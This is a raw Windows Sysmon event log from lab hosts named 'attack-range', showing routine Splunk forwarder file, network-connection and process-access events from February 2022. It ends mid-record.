23542300x8000000000000000216727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:08.530{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2226B675F0A69BCE4E4A87561D2CC7F9,SHA256=4DB197E3A11F9D8F61603FF54465EE2A5AD621D1518F99BB244E03385A63DD5E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:05.688{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53445-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:09.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40ED836FB3A41EE5A24DB859097FE29F,SHA256=F85CE2C009AAE37DD452497DCF865F6638D568F7AF76A73B9A6A0BC2430CDA3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:09.624{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7514392D6BAA3A8BB35460079D7B7D4,SHA256=8BA2899E73B33F3D220D292100624AC3B34E8139FD695F7C28A74E22E9DA5F8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:10.808{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0DD136086CEA00469603E8EFDE4420A,SHA256=A40F276C1FB97BBA63355967A9FCC448D4FB3415217564D2FD11257FA9FF5395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:10.624{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5DFA9145E84A991D56F7101D4CD77D2,SHA256=A1E99459FC7389E1D2080DE858FF9550D5ADAEC37771B2A88D640B4E3000F7BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:11.949{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E457C313465314B2DA5A042BFAA0EB03,SHA256=FAC1DEF7E3317F985B899A3A2B2BFC9E6B251AAC4372E421092635EFEBEA3291,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:11.624{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=412F34EB4B3EBA4CCA1ACABBC22ABB17,SHA256=B463DEAFBB8CD6C6948DBA1A04663AD574FD6398322AF5CFE3A49BAB6C56EF34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:12.980{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51446904E95F18865374CE61300A694F,SHA256=5797DB908EAF200891ABF485325D53FAF11F0FAE8604FAEE9D76669266E51BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:12.655{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A67421668F5C124057409737EAC2B63,SHA256=BC1603FCEDBE61F784641E98FD3992E43AC077F2564D910BDACDF7B993B7C3D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:10.719{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53446-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:13.811{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB43FF47C40C16578397A67A271124AE,SHA256=47B136284607B9DE488681E5C71BEA5CB20FD199BA9B88688B8B2AC6F3FC98EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:14.827{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CF6B2871236E101FA557089D4A8150F,SHA256=F86B38AB1888BF4D91CF82AE9ABD184B4512E05CBC19CC8BE12DB750E2A4C269,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:14.011{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13F181A2C0967FBC187FC957BFE45670,SHA256=A5B882B7CB830D72BECEE7073D42FCB2712C298102E76E4A5CA37B87765831CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:12.504{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51346-false10.0.1.12-8000- 23542300x8000000000000000216736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:15.842{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5EC36316EA4FF45A4F25FD88B966E95,SHA256=74B0586927101744ED3B54A8988A49C2D675C1623D6BCDD885571F3FE5EA757F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:15.152{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AD35588F3D9F70677FD2A3797724853,SHA256=F4F9ACEB1711C666BBCA83E21C3A39C00DD6FD7001C3DAE87E6F62CDB17C165C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:16.858{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CAEFA833FC87FAA1098260B6CAEE93C,SHA256=7DF0CF23AC27E38720A4EA1354298A1E379D7D87918585D0E63727794D8EBC07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:16.953{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-134MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:16.183{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EAE891C205291B2462BB33BEB66FF50,SHA256=63B67BA44CAEA09F97AE7BC04BF9875024690898BDB43B6A6692AA37E28B19DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:17.874{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C9539E1587B1F2CE8637C3A6DEA12A2,SHA256=CD2B1A5849F363BFCC5A6F7DDFF4A006DD9CF66A5A8B7C21A907C2332652B0F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:17.952{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-135MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:17.185{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=244B973CB9918535C167177E0105F182,SHA256=5BE2EC6E3CC3D1A1A4AA0AB0EC27725D5A623EFBE7B7D21E41B99BFCDF1FEFEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:18.889{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66D16B4D1ACFC7A57718DE934E78E1CF,SHA256=DE97C23B978D08D553063737C5ED0658C2EF333C8B71E56F654FE191A7A45BA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:18.215{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB7A707E17A04178DAF71915C7A028C0,SHA256=96F027CFDB0D90AF5B9D99BE42695FF9305AECDA244DB77C2B9EF51488186C9C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.875{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11A7-6216-1205-000000003802}92C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.875{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-11A7-6216-1205-000000003802}92C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.875{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11A7-6216-1205-000000003802}92C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.876{C8EA50B7-11A7-6216-1205-000000003802}92C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000287809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:16.736{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53447-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000287808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.594{C8EA50B7-11A7-6216-1105-000000003802}43282404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.375{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11A7-6216-1105-000000003802}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 